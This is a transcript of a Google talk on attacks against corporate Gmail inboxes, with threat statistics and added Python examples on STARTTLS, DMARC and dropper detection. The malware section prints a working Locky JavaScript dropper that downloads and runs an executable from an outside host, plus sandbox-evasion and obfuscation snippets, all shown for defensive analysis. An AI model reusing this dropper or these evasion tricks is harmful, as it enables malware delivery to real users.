Elie Bursztein with the help of many Googlers @elie Targeted Attacks Against Corporate Inboxes - a Gmail Perspective SESSION ID: HT-R11
Apr 12, 2017
g.co/research/protect
1.X BILLION USERS
Stopping hundreds of billions of attacks every week
A corporate inbox receives 4.3x more malware than an end-user inbox
Science-related German companies receive 9.6x more phishing attempts than their US counterparts
Goal: highlight how different groups of Gmail users exhibit different threat profiles
Agenda: Global trends, Countries trends, Organization trends
Global trends covered: Spam, Phishing, Impersonation, Malware, Interception
Spam
Google embraces deep learning
Android, Gmail, Photos, Maps, NLP, Robotics research, Speech, Translation, YouTube and many others
Deep learning for photo auto-tagging
User photo → Deep Convolutional Neural Network → Automatic tag (“ocean”)
Deep learning powers Google Photos search
“Wow, the new Google photo search is a bit insane. I didn’t tag those”
“Google photo search is awesome. Searched with keyword drawing to find all my scribble at once :D”
Tensor Processing Unit (TPU)
We do deep learning efficiently and at Google scale thanks to dedicated ASICs
https://cloudplatform.googleblog.com/2016/05/Google-supercharges-machine-learning-tasks-with-custom-chip.html
Using deep learning allows us to stay ahead of spammers
Interception
Encrypting email in transit with STARTTLS
Sender (Alice) → Mail server (smtp.source.com) → Mail server (smtp.destination.com) → Recipient (Bob)
Eavesdropper (Eve) listens on the path between the mail servers
80% / 87%
Transparency report - June 2014
https://googleblog.blogspot.com/2014/06/transparency-report-protecting-emails.html
Transparency report chart: fraction of email encrypted (inbound traffic and outbound traffic), 2013-12 to 2016-12
Broken lock UI - February 2016
Broken lock UI chart: fraction of email encrypted (inbound traffic and outbound traffic), 2013-12 to 2016-12
Increasing encryption visibility helped speed up adoption
Next: SMTP Strict Transport Security
Prevents MITM using a rogue certificate, like HTTPS pinning for email
Coming soon!
Industry-wide effort via MAAWG and IETF; Google, Microsoft, Yahoo and Comcast are all on board
SMTP Strict Transport Security is the next big milestone
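The server-to-server STARTTLS hop from the earlier slides, and the downgrade that a strict transport policy is meant to close, as an added example (constructed here, not Google's or Gmail's code). A sending MTA parses the receiving MTA's EHLO reply and decides whether to upgrade; the replies, hostnames and the names of the two policies are assumptions modelled on the slides.

```python
"""Simulated STARTTLS negotiation on the server-to-server hop.

Constructed example, not Gmail code. The sending MTA reads the receiving
MTA's EHLO reply and decides whether to upgrade. Opportunistic STARTTLS
falls back to cleartext when the capability is missing; a strict policy
in the spirit of SMTP Strict Transport Security refuses to deliver.
"""
import re

# Constructed EHLO replies (RFC 5321 multi-line format): a STARTTLS-capable
# receiver, and the same reply with the STARTTLS line removed on the path.
EHLO_WITH_STARTTLS = "250-smtp.destination.com Hello\r\n250-STARTTLS\r\n250 8BITMIME\r\n"
EHLO_STRIPPED = "250-smtp.destination.com Hello\r\n250 8BITMIME\r\n"

def parse_ehlo(reply: str) -> set:
    """Return the EHLO keywords advertised; the first line is only the greeting."""
    keywords = set()
    for line in reply.strip().split("\r\n")[1:]:
        match = re.match(r"250[ -](\S+)", line)
        if match:
            keywords.add(match.group(1).upper())
    return keywords

def negotiate(reply: str, policy: str) -> str:
    """Sending MTA decision: 'tls', 'cleartext' or 'refuse'."""
    if "STARTTLS" in parse_ehlo(reply):
        return "tls"          # both sides upgrade; Eve only sees ciphertext
    if policy == "opportunistic":
        return "cleartext"    # silent fallback: the downgrade a MITM relies on
    return "refuse"           # strict: fail closed, defer delivery and retry

def transcript(reply: str, policy: str) -> list:
    """Client (C) and server (S) lines exchanged after the greeting."""
    lines = ["C: EHLO smtp.source.com"]
    lines += ["S: " + line for line in reply.strip().split("\r\n")]
    outcome = negotiate(reply, policy)
    if outcome == "tls":
        lines += ["C: STARTTLS", "S: 220 Ready to start TLS", "(TLS handshake, EHLO again over TLS)"]
    elif outcome == "cleartext":
        lines += ["C: MAIL FROM:<alice@source.com>", "(message relayed in the clear)"]
    else:
        lines += ["C: QUIT", "(delivery deferred: STARTTLS required by policy)"]
    return lines
```

Printing `transcript(EHLO_STRIPPED, "opportunistic")` next to `transcript(EHLO_STRIPPED, "strict")` shows why visibility alone is not enough: only the strict policy keeps Alice's message off the wire when the capability is missing.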
Impersonation
Email authentication: DKIM, DMARC, ARC, SPF
DKIM: sign your email cryptographically
SPF: specify which email servers to trust
DMARC: define what to do with fake emails
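How the three mechanisms combine on the receiving side, as an added example that is not from the talk or from Gmail: a DMARC evaluator that checks the SPF and DKIM results for alignment with the visible From: domain and returns the domain owner's policy. The record, domains and pass/fail results are constructed, and organizational-domain matching is approximated without a public suffix list.

```python
"""DMARC evaluation for a single message.

Constructed example, not Google's code. It combines the three mechanisms
from the slides: SPF (which servers may send), DKIM (a cryptographic
signature) and DMARC (what to do when neither result aligns with the
visible From: domain). The SPF lookup and DKIM signature verification
are assumed to have already produced pass/fail results.
"""

def parse_dmarc(record: str) -> dict:
    """Parse a _dmarc TXT record such as 'v=DMARC1; p=reject; adkim=s' into tags."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip().lower()
    tags.setdefault("adkim", "r")   # DMARC defaults: relaxed alignment for both
    tags.setdefault("aspf", "r")
    tags.setdefault("p", "none")    # simplification: a record without p is treated as monitor-only
    return tags

def org_domain(domain: str) -> str:
    """Organizational domain, approximated as the last two labels (no public suffix list)."""
    return ".".join(domain.lower().split(".")[-2:])

def aligned(from_domain: str, auth_domain: str, mode: str) -> bool:
    """Strict mode needs identical domains; relaxed mode accepts the same organizational domain."""
    if not auth_domain:
        return False
    if mode == "s":
        return from_domain.lower() == auth_domain.lower()
    return org_domain(from_domain) == org_domain(auth_domain)

def dmarc_disposition(from_domain: str, record: str, spf_result: str, spf_domain: str,
                      dkim_result: str, dkim_domain: str) -> str:
    """Return 'pass', or the policy action to apply: 'none', 'quarantine' or 'reject'."""
    tags = parse_dmarc(record)
    spf_ok = spf_result == "pass" and aligned(from_domain, spf_domain, tags["aspf"])
    dkim_ok = dkim_result == "pass" and aligned(from_domain, dkim_domain, tags["adkim"])
    if spf_ok or dkim_ok:
        return "pass"        # at least one authenticated identifier aligns with From:
    return tags["p"]         # fake or misconfigured: apply the domain owner's policy
```

A message that passes SPF for the sending provider's own bounce domain but carries no aligned DKIM signature is the common case that stays at "none" or "quarantine" for most senders today, which is what the low DMARC adoption on the next slide refers to.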
Surfacing authentication status
Authenticated Not authenticated
https://blog.google/products/gmail/making-email-safer-for-you-posted-by/
Authentication over time
https://security.googleblog.com/2013/12/internet-wide-efforts-to-fight-email.html
Chart values: Dec 2014 1.8%, Dec 2015 2.8%, Dec 2016 5.8%
Most emails are authenticated
DMARC adoption is too low
Phishing
Targeted financial phishing is on the rise
Malware
Ransomware is the largest malware threat
Locky seen by Gmail vs Internet - May 2016
Normalized by number of emails; a single hash is potentially used in many emails
Locky is part of a complex ecosystem
Locky, Dridex
Locky vs Dridex daily pattern - May 2016 (chart: Locky, Dridex)
Rise of JavaScript droppers as a means to evade anti-virus
Anatomy of a Locky dropper
// get temp directory
var shell = new ActiveXObject("WScript.Shell");
var tmpDir = shell.ExpandEnvironmentStrings("%TEMP%");
// fetch the payload
var xhr = new ActiveXObject("MSXML2.XMLHTTP");
xhr.open("GET","http://shady.ru/payload.exe",false);
xhr.send(null);
var payload = xhr.responseBody;
// write payload to disk
var writer = ActiveXObject("ADODB.Stream");
writer.open();
writer.type = 2;
writer.write(payload);
writer.SaveToFile(tmpDir + "\\payload.exe");
// execute the payload
shell.Run(tmpDir + "\\payload.exe", "", false);
Steps: get temp directory, fetch payload, write payload to disk, execute payload
Locky May 5th attack
Chart: number of emails blocked per hour (log scale, 1x to 1000x), internal detector vs commercial anti-virus, hourly from 04-05 23:00 to 04-06 18:00; peaks labelled 20 000 m/h and 30 000 000 m/h
Evasion attempts via file type switch
AV DDoS exploit via malicious comments
Comment sample
JavaScript obfuscation - Property access
String.prototype.foo = function() { return this.substr(1,1); };
namespaces = ('a', 'b', "ip");
select = "W";
fireWith = "gt".foo();
origName = (fireWith.split((1,"b")), "Scr");
mozMatchesSelector = (((18 ^ rbracket), (1332 / delegateTarget)), (((162, rscriptType) / (13 & preFilter)), this));
bind = mozMatchesSelector[select + origName + namespaces + fireWith];
…
subtract = bind[noConflict + finalDataType + percent](define + focusin + clientTop);
…
slideUp = subtract[mouseenter + andSelf + isReady + fireWith + matchesSelector + matchIndexes](JSON + ownerDocument) + file + now;
The assembled property name "W" + "Scr" + "ip" + "t" resolves to WScript
Sandbox detection via timer check
var t1 = new Date().getMilliseconds();
WScript.Sleep(10);
var t2 = new Date().getMilliseconds();
if (t2-t1 <= 10) WScript.Quit();
HoneyClients don't sleep
Emulation detected!
OS check via JScript-specific behavior
b(); var greet = (function b() { }, "hello");
b is defined and hoisted only in JScript
b.foo(); var greet = (function b() { }, "hello"); function b.prototype.foo() { }
not valid ES3/5/6
http.option(1) = true
not valid ES6
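A defender's counterpart to the dropper anatomy above and the three evasion tricks just listed, added here as an example (not Gmail's detector and not from the talk): static triage that scores a script attachment for the fetch, write and run chain, property names assembled from string pieces, the Sleep timer check and JScript-only syntax. The patterns, weights, threshold and both sample scripts are constructed assumptions.

```python
"""Static triage of a script attachment for dropper traits.

Constructed example, not Gmail's detector. It scores the building blocks
shown in the slides: the WScript.Shell / XMLHTTP / ADODB.Stream fetch,
write and run chain, property names assembled from string pieces, the
Sleep-based timer check and JScript-only syntax. Weights, the threshold
and the sample scripts are assumptions made for illustration.
"""
import re

# (trait, regex, weight): the download-write-execute chain carries most weight.
TRAITS = [
    ("wscript_shell", r'ActiveXObject\(\s*["\']WScript\.Shell["\']', 2),
    ("xmlhttp_fetch", r'ActiveXObject\(\s*["\']MSXML2\.XMLHTTP["\']', 3),
    ("adodb_stream", r'ActiveXObject\(\s*["\']ADODB\.Stream["\']', 3),
    ("shell_run", r'\.Run\(', 2),
    ("timer_check", r'WScript\.Sleep\([\s\S]*?getMilliseconds', 2),
    ("prototype_patch", r'String\.prototype\.\w+\s*=\s*function', 1),
    ("jscript_proto_fn", r'function\s+\w+\.prototype\.\w+\s*\(', 2),
    ("jscript_call_assign", r'\.\w+\(\d+\)\s*=(?!=)', 2),
]

def bracket_concat_count(script: str) -> int:
    """Count obj[a + b + ...] accesses, i.e. property names built from pieces."""
    return len(re.findall(r'\w+\[\s*\w+(?:\s*\+\s*\w+)+\s*\]', script))

def triage(script: str, threshold: int = 6) -> dict:
    """Score one script body and return matched traits with a verdict."""
    hits = [name for name, pattern, _ in TRAITS if re.search(pattern, script)]
    score = sum(weight for name, _, weight in TRAITS if name in hits)
    if bracket_concat_count(script) >= 2:    # two or more assembled property names
        hits.append("bracket_concat")
        score += 2
    return {"hits": hits, "score": score, "malicious": score >= threshold}

# Constructed samples: the first mirrors the dropper anatomy from the slides
# with a placeholder host, the second is a harmless logon script.
DROPPER_LIKE = (
    'var shell = new ActiveXObject("WScript.Shell");\n'
    'var xhr = new ActiveXObject("MSXML2.XMLHTTP");\n'
    'xhr.open("GET", "http://placeholder.invalid/x.exe", false); xhr.send(null);\n'
    'var w = new ActiveXObject("ADODB.Stream"); w.SaveToFile("x.exe");\n'
    'shell.Run("x.exe", "", false);\n'
)
BENIGN_LOGON = (
    'var shell = new ActiveXObject("WScript.Shell");\n'
    'var home = shell.ExpandEnvironmentStrings("%USERPROFILE%");\n'
    'WScript.Echo("Welcome " + home);\n'
)
```

The point of the weighting is that WScript.Shell alone is common in legitimate logon scripts, so it only becomes a verdict in combination with the download and write-to-disk steps or with the evasion tricks.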
Organizational trends
Professional inboxes are 6.2x more targeted by phishing and 4.3x more targeted by malware than end-user inboxes
Gmail: Spam 1.0x, Phishing 1.0x, Malware 1.0x
G Suite: Spam 0.4x, Phishing 6.2x, Malware 4.3x
Organization type insights
A corporate inbox is 3.2x more targeted by phishing email than an EDU inbox
Education 1.0x, Government related 1.8x, Non Profit 1.2x, Company 3.2x
Non-profit inboxes are 2.3x more targeted by malware than corporate inboxes
Education 2.1x, Government related 1.3x, Non Profit 2.3x, Company 1.0x
A corporate inbox receives 3.1x more encrypted emails than an EDU inbox
Education 1.0x, Government related 1.2x, Non Profit 1.3x, Company 3.1x
Company sectors insights
Entertainment, IT and housing related companies are the most targeted by spam as of Q1 2017
Utilities 1.0x
Finance and Insurance 1.3x
Natural resources 1.5x
Manufacturing 1.5x
Administrative 1.5x
Wholesale Trade 1.7x
Management 1.8x
Transportation 2.2x
Science 2.5x
Construction 2.6x
Accommodation & Food 2.6x
Health 2.6x
Retail Trade 2.7x
Housing 4.3x
Information Technology 4.9x
Entertainment 6.1x
Finance, Arts and IT related companies are the most targeted by phishing as of Q1 2017
Utilities 1.0x
Finance and Insurance 8.6x
Natural resources 1.2x
Manufacturing 1.8x
Administrative 1.6x
Wholesale Trade 1.9x
Management 1.4x
Transportation 4.9x
Science 2.8x
Construction 1.8x
Accommodation & Food 1.5x
Health 3.3x
Retail Trade 2.8x
Housing 4.3x
Information Technology 6.9x
Entertainment 7.6x
Volume of phishing attempts depends on country and sector
Chart: phishing volume for the finance sector and the IT sector across France, Canada, USA, India, UK, Japan and Brazil; one bar exceeds 10x. Values as labelled: 1.0x, 1.8x, 2.8x, 3.2x, 3.2x, 4.4x, 5.8x (one series) and 1.9x, 1.4x, 1.2x, 1.0x, 1.7x, 1.2x, > 10x (other series)
Entertainment and utilities related companies are the ones that received the most encrypted emails as of Q1 2017
Utilities 1.3x
Finance and Insurance 1.0x
Natural resources 1.2x
Manufacturing 1.2x
Administrative 1.2x
Wholesale Trade 1.2x
Management 1.3x
Transportation 1.3x
Science 1.3x
Construction 1.1x
Accommodation & Food 1.3x
Health 1.2x
Retail Trade 1.2x
Housing 1.1x
Information Technology 1.2x
Entertainment 1.3x
Real estate is by far the sector that is the most targeted by malware as of Q1 2017
Science 1.0x
Health Care 1.1x
Wholesale Trade 1.2x
Entertainment 1.3x
Finance and Insurance 1.4x
Manufacturing 1.7x
Information Technology 1.7x
Administrative 2.0x
Mining 2.2x
Accommodation and Food 2.2x
Retail Trade 2.3x
Utilities 2.4x
Construction 3.6x
Transportation 4.5x
Real Estate > 10x
Countries trends
EU is not at the forefront of email security
STARTTLS: USA 1.2x, Japan 1.1x, Brazil 1.0x, India 1.2x, UK 1.1x, France 1.0x, Canada 1.1x, Germany 1.1x, Korea 1.1x, Australia 1.1x
DKIM: USA 1.4x, Japan 1.0x, Brazil 1.6x, India 1.6x, UK 1.3x, France 1.4x, Canada 1.5x, Germany 1.2x, Korea 1.6x, Australia 1.5x
India and Japan have the most spammed inboxes as of Q1 2017
USA 2.0x, Japan 4.1x, Brazil 2.7x, India 3.8x, UK 1.3x, France 1.0x, Canada 1.6x, Germany 1.2x, Korea 1.8x, Australia 1.1x
The largest spammers in the world target other countries
1. USA
2. Germany
3. France
4. Japan
5. United Kingdom
6. Romania
7. Spain
8. Brazil
9. Canada
10. Russia
Japan inboxes are heavily targeted by phishing as of Q1 2017.
USA 2.1x, Japan 5.9x, Brazil 3.5x, India 1.7x, UK 1.9x, France 1.0x, Canada 3.0x, Germany 1.6x, Korea 1.1x, Australia 1.7x
Recap
Deep learning is providing the edge we need to combat email abuse
Transparency helps drive adoption of security technologies through the ecosystem
Each organization has a unique threat profile that should be considered when prioritizing defenses
Thanks g.co/research/protect